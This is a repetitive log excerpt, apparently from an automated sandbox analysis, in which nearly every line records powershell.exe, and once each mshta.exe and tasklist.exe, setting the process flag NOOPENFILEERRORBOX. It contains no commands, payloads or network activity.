Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
